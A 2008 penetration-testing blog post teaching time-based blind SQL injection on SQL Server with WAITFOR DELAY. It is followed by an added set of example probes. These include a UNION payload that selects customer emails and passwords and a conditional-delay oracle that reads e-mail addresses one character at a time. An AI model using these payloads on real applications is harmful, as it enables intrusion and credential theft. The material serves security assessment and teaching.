Saturday, January 12, 2008

SQL Injection: Give yourself a little time...

I was recently involved in a web application assessment and discovered something that I wanted to pass along. Keep in mind that this has probably been utilized before, but it is something that I just noticed, so ... I wanted to throw it out for your amusement.

To set the stage, I had been looking at this application for quite some time and had an idea that SQL Injection might exist, but I was having much difficulty determining if the injection was actually present. The application was catching errors, displaying 404s, etc., and really not displaying any good data to make a decision. So .... the question was ... if the application is catching our errors and really not giving us anything to work with ... how could we ask the database a question whose answer would indicate whether our requests were actually being processed by the database server?

Answer? Time!

Since the application is catching all of our attempts and not providing any good feedback, the thought was ... let's come up with a way to have the database provide us an "indirect" response. To do this, I tried "waitfor". In Transact-SQL (Microsoft SQL Server), WAITFOR specifies a time, time interval, or event that triggers the execution of a statement block, stored procedure, or transaction. Other database engines have their own equivalents (MySQL's SLEEP() and PostgreSQL's pg_sleep(), for example), but the syntax below is SQL Server's.

Syntax: WAITFOR { DELAY 'time' | TIME 'time' }

DELAY pauses for the given interval (hh:mm:ss); TIME pauses until the given clock time. For injection testing you want DELAY.

To implement 'waitfor', simply tag it onto the end of the injection test you're trying to accomplish. For example, if your injection string is:

=> 30000' union select 1,email,password from Customers --

By implementing 'waitfor', your string might appear as....

=> 30000' union select 1,email,password from Customers waitfor delay '0:0:30' --

Keep in mind that while the injection results might not appear on your screen, you will experience a delay in the response back to the browser. The point here is to demonstrate that our injection is being accepted by the database server and that the injection is executing. So, while our injection string might not render results to the screen, we can confirm that the database server is executing our injection strings. A few practical notes: the delay is the only signal, so compare it against the normal response time and repeat the request, since a single slow response can just be network or server load; pick a delay long enough to stand out but shorter than any application, proxy or browser timeout (a few seconds is usually plenty, and 30 seconds may just get you a timeout page instead of a slow page); and test the WAITFOR on its own before combining it with a UNION, because if the UNION's column count does not match the original query, SQL Server rejects the whole batch at compile time and the WAITFOR never runs, so you see no delay even though the injection point is real.
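The probes below are an added example and are not part of the original post. They assume a SQL Server backend and a hypothetical application query, SELECT name, price FROM Products WHERE sku = '<input>', that concatenates the user-supplied value straight into the WHERE clause; the Products and Customers tables, their column names and the 10-second delay are all assumptions. Steps 4 and 5 go beyond the post and use the same delay as a yes/no oracle.

```sql
-- Added example (not the original post's code). Assumes a Microsoft SQL
-- Server backend and a hypothetical application query that concatenates the
-- user-supplied value straight into the WHERE clause:
--
--     SELECT name, price FROM Products WHERE sku = '<input>'
--
-- Each step shows the input sent and the batch the server actually runs.
-- The trailing --' is the application's own closing quote, commented out.

-- 1. Baseline: a harmless value, so you know what a normal response time is.
--    Input:  30000'--
SELECT name, price FROM Products WHERE sku = '30000'--'

-- 2. Delay-only probe. T-SQL accepts whitespace-separated statements in one
--    batch, so WAITFOR becomes a second statement. A response that takes
--    about 10 s longer than the baseline confirms the batch executed.
--    Input:  30000' WAITFOR DELAY '0:0:10'--
SELECT name, price FROM Products WHERE sku = '30000' WAITFOR DELAY '0:0:10'--'

-- 3. Why step 2 comes before a UNION payload: here the UNION supplies three
--    columns against a two-column SELECT. That is a compile-time error
--    (Msg 205), the whole batch is rejected and the WAITFOR never runs, so
--    no delay is seen even though the injection point is real.
--    Input:  30000' UNION SELECT 1, email, password FROM Customers WAITFOR DELAY '0:0:10'--
SELECT name, price FROM Products WHERE sku = '30000' UNION SELECT 1, email, password FROM Customers WAITFOR DELAY '0:0:10'--'

-- 4. Conditional delay (beyond the post): the same channel as a yes/no
--    oracle. The server pauses only if the Customers table has rows.
--    Input:  30000' IF (SELECT COUNT(*) FROM Customers) > 0 WAITFOR DELAY '0:0:10'--
SELECT name, price FROM Products WHERE sku = '30000' IF (SELECT COUNT(*) FROM Customers) > 0 WAITFOR DELAY '0:0:10'--'

-- 5. Reading data one character at a time with that oracle: pause if the
--    first character of the first e-mail address is greater than 'm' (109).
--    Varying the threshold and the SUBSTRING position reads the value out.
--    Input:  30000' IF ASCII(SUBSTRING((SELECT TOP 1 email FROM Customers), 1, 1)) > 109 WAITFOR DELAY '0:0:10'--
SELECT name, price FROM Products WHERE sku = '30000' IF ASCII(SUBSTRING((SELECT TOP 1 email FROM Customers), 1, 1)) > 109 WAITFOR DELAY '0:0:10'--'
```

Send each input through the suspect parameter and compare the response time with the baseline from step 1, repeating the delayed probes a few times so that one slow response caused by network or server load is not mistaken for the WAITFOR.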